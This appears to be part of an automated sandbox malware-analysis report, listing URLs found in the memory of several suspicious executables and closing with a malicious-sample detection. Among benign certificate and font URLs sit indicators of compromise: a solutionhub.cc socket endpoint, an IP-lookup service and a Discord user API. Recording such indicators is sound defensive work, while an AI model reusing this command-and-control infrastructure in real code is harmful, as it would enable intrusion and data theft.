                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2163427307.00000234D5BBC000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172784971.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2165069693.00000234D5C04000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172293908.00000234D5B00000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2171457608.00000234D5AB9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2651808657.0000021E0314C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2655069424.0000021E03483000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2668665930.0000021E0343C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2673976502.0000021E031AC000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2670749256.0000021E03483000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2746248549.00000159F356C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2772816830.00000159F38E4000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2750695258.00000159F35B3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2768752871.00000159F3574000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2754063369.00000159F345A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2945215932.0000020E49844000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2940578009.0000020E494EB000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2895586429.0000020E494D3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2892087005.0000020E4948C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                            Source: sys_updater.exe, 00000018.00000003.2650108761.0000021E02FCE000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2650910116.0000021E02FD0000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2651562106.0000021E02FD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.2
                            Source: sys_updater.exe, 00000018.00000003.2650108761.0000021E02FCE000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2650910116.0000021E02FD0000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2651562106.0000021E02FD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microso(
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2163427307.00000234D5BBC000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172784971.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2165069693.00000234D5C04000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172293908.00000234D5B00000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2171457608.00000234D5AB9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2651808657.0000021E0314C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2655069424.0000021E03483000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2668665930.0000021E0343C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2673976502.0000021E031AC000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2670749256.0000021E03483000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2746248549.00000159F356C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2772816830.00000159F38E4000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2750695258.00000159F35B3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2768752871.00000159F3574000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2754063369.00000159F345A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2945215932.0000020E49844000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2940578009.0000020E494EB000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2895586429.0000020E494D3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2892087005.0000020E4948C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172784971.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2656389564.0000021E0315F000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2673976502.0000021E031AC000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2754063369.00000159F345A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172784971.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2656389564.0000021E0315F000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2673976502.0000021E031AC000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2754063369.00000159F345A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertGlobalRootG2.crtC
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172784971.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2656389564.0000021E0315F000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2673976502.0000021E031AC000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2754063369.00000159F345A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertGlobalRootG2.crtv
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172784971.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2656389564.0000021E0315F000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2673976502.0000021E031AC000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2754063369.00000159F345A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172931387.00000234D5A31000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2654235111.0000021E03061000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2674289019.0000021E0314A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2894652194.0000020E47C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                            Source: sys_updater.exe, 0000001F.00000003.2918254433.0000020E49495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.m.
                            Source: explert.exe, 00000004.00000003.1712362816.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1712419900.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cj
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.s
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172293908.00000234D5AAE000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2165069693.00000234D5BB1000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2670749256.0000021E03431000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2655069424.0000021E03431000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2772816830.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2750695258.00000159F3560000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2945215932.0000020E497F1000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2895586429.0000020E49481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172293908.00000234D5AAE000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2165069693.00000234D5BB1000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2670749256.0000021E03431000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2655069424.0000021E03431000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2772816830.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2750695258.00000159F3560000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2945215932.0000020E497F1000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2895586429.0000020E49481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172293908.00000234D5AAE000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2165069693.00000234D5BB1000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2670749256.0000021E03431000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2655069424.0000021E03431000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2772816830.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2750695258.00000159F3560000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2945215932.0000020E497F1000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2895586429.0000020E49481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.0v
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                            Source: sys_updater.exe.26.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                            Source: sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc/
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc/$;
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc/-;
                            Source: sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc/2;
                            Source: explert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc/8
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc/;
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc/;;
                            Source: sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc/A;
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc/O;.
                            Source: sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc/T;
                            Source: explert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc/U
                            Source: explert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc/Z
                            Source: explert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc/b
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc/e;
                            Source: explert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc/k
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc/s;
                            Source: sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc/socket/?id=5A9B846E0A19DD545B8CA4BF94E01DCEB8D04EDC07764AA4329CDB473E7FBAA3&u
                            Source: explert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc/~
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc:443/socket/
                            Source: sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc:443/socket/?id=5A9B846E0A19DD545B8CA4BF94E01DCEB8D04EDC07764AA4329CDB473E7FBA
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc:443/socket/b.cc/
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc:443/socket/nx8d.exe/
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.00000000030B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_b40bcab2-3

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
